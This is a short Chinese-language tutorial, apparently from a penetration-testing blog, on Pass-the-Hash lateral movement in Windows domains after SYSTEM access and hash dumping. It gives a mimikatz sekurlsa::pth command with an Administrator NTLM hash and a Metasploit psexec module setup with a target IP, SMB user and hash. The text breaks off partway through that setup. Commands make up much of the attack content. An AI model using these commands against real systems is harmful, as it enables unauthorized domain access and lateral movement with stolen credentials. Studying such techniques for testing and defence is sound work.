Hash传递相关知识点

PTH介绍

当我们拿到一台服务器的SYSTEM权限之后,利用工具获取到了服务器的HASH值,但是无法抓取到明文密码或者密文解不开,这个时候我们可以尝试进行Pass The Hash(Hash传递)进行横向的渗透攻击

利用mimikatz进行pth

这里的实验机器是windows server 2012 r2(dc),发现并没有抓取到明文,这个密文设置的密码也解不出来,注意这里的SID为500.

然后接着在攻击机器上(在域控中的机器)mimikatz中输入如下的命令

12

privilege::debugsekurlsa::pth /user:Administrator /domain:domainname /ntlm:519c985a849313d2c8029b293b57de1f

效果是这个样子的,然后他会弹出一个新的cmd窗口

这种方式会感觉有些鸡肋,为什么呢,因为弹出新的cmd窗口,你得登上域内的一台3389才能利用这种方式啊,要是登不上域内的远程桌面,命令行下这种方式不行,就像win10的bypass uac一样,不是很喜欢这种弹出新框框的东西 🙂

利用msf进行pth

1234

use exploit/windows/smb/psexecset rhosts 192.168.15.181set SMBUser rabbitmaskset SMBPass aad3b435b51404eeaad3b435b51404ee:0515322a55615056aaabb044a48463a4